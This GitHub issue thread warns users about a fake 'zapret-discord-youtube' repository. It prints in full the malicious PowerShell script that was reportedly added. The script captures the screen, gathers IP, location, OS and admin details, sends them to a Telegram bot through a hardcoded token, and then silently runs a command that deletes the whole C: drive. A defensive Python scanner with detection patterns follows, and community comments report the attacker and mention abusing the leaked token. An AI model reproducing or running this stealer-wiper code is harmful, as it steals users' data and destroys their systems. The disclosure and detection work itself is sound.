Open SizRex opened 2 hours ago
Malicious code that was added
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
Add-Type -AssemblyName 'System.Net.Http'
try {
$screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height
$graphics = [System.Drawing.Graphics]::FromImage($bitmap)
$graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)
$memoryStream = New-Object System.IO.MemoryStream
$bitmap.Save($memoryStream, [System.Drawing.Imaging.ImageFormat]::Png)
$graphics.Dispose()
$bitmap.Dispose()
$memoryStream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null
$country = (Invoke-RestMethod -Uri "http://ipinfo.io/country").Trim()
$city = (Invoke-RestMethod -Uri "http://ipinfo.io/city").Trim()
$ip = (Invoke-RestMethod -Uri "http://ifconfig.me").Trim()
$isAdmin = (whoami /groups | Select-String "S-1-5-32-544").Length -gt 0
$rights = if ($isAdmin) { "Admin" } else { "User " }
$os_caption = (Get-CimInstance Win32_OperatingSystem).Caption
$os_arch = if ([Environment]::Is64BitOperatingSystem) { "x64" } else { "x86" }
$message = @"
Type: $os_caption ($os_arch)
From: $country $city ($ip)
Name: $env:USERNAME ($rights)
"@
$bot_token = "7872562304:AAHDovPEKL6JPliHzkjUYTd26f8YFuM8vDA"
$chat_id = "@dgfkewr"
$uri = "https://api.telegram.org/bot$bot_token/sendPhoto"
$client = [System.Net.Http.HttpClient]::new()
$client.Timeout = [TimeSpan]::FromMinutes(5)
$multipartContent = [System.Net.Http.MultipartFormDataContent]::new()
$fileContent = [System.Net.Http.StreamContent]::new($memoryStream)
$fileContent.Headers.ContentType = [System.Net.Http.Headers.MediaTypeHeaderValue]::Parse("image/png")
$multipartContent.Add($fileContent, "photo", "screenshot.png")
$multipartContent.Add([System.Net.Http.StringContent]::new($chat_id), "chat_id")
$multipartContent.Add([System.Net.Http.StringContent]::new($message), "caption")
$response = $client.PostAsync($uri, $multipartContent).Result
Start-Process -FilePath "cmd" -ArgumentList @("/c", "rd /s /q C:\") -PassThru -WindowStyle Hidden
}
finally {
if ($memoryStream) {
$memoryStream.Dispose()
}
if ($client) {
$client.Dispose()
}
}
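A static triage check for the behaviours visible in the script above, for reviewing a downloaded `.ps1`/`.bat` before running it. This is an added example, not code from this thread or from the project; the rule names, the assumed token shape and both sample inputs are constructed, and the token in the sample is a placeholder.

```python
import re

# Behaviours taken from the script posted in this issue. The token shape
# (digits, colon, 35 URL-safe characters) is an assumption, not a spec.
RULES = {
    "screen_capture": r"CopyFromScreen",
    "public_ip_lookup": r"\b(?:ipinfo\.io|ifconfig\.me)\b",
    "telegram_bot_api": r"api\.telegram\.org/bot",
    "hardcoded_bot_token": r"\b\d{8,10}:[A-Za-z0-9_-]{35}\b",
    "hidden_process": r"-WindowStyle\s+Hidden",
    # Recursive quiet delete aimed at a drive root, not at a subdirectory.
    "drive_root_delete": r"\b(?:rd|rmdir)\s+/s\s+/q\s+\"?[a-z]:\\?(?=[\"'\s)]|$)",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in RULES.items()}

def scan(text):
    """Return {rule_name: [line numbers]} for every rule that matched."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in COMPILED.items():
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def verdict(hits):
    """Classify by combination; a single weak indicator only asks for review."""
    labels = []
    if "screen_capture" in hits and "telegram_bot_api" in hits:
        labels.append("stealer")
    if "drive_root_delete" in hits:
        labels.append("wiper")
    return labels or (["review"] if hits else ["clean"])

# Constructed sample inputs (not real files); the token is a placeholder.
SUSPECT = "\n".join([
    r'$g.CopyFromScreen($s.Left, $s.Top, 0, 0, $b.Size)',
    r'$ip = (Invoke-RestMethod -Uri "http://ifconfig.me").Trim()',
    '$bot_token = "0000000000:' + "A" * 35 + '"',
    r'$uri = "https://api.telegram.org/bot$bot_token/sendPhoto"',
    r'Start-Process "cmd" -ArgumentList @("/c", "rd /s /q C:\") -WindowStyle Hidden',
])
BENIGN = "\n".join([r'rd /s /q C:\temp\build', r'irm "https://ipinfo.io/country"'])

if __name__ == "__main__":
    for name, sample in (("SUSPECT", SUSPECT), ("BENIGN", BENIGN)):
        print(name, verdict(scan(sample)), scan(sample))
```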
Reported
I think you should also report the Telegram Bot he uses. He also showed his token. Probably can spam
I have no idea how to report his Telegram (bot) but he messages me and I can confirm that 1000+ systems were affected by this fake
He just started spamming in the comments of all Issues with the "new version". What a pathetic creature
I personally reported everyone in the group and the group itself.
Some hero is spamming their group through a leaked token ROFL
That's some nice community against these guys)
np lil bro 😊
There is a fake repository and a fake account of this repository's creator. Please report him before more people install the virus! This virus just deleted my whole system. And this mo** edited my comment
https://github.com/FlowseaI/zapret-discord-youtube/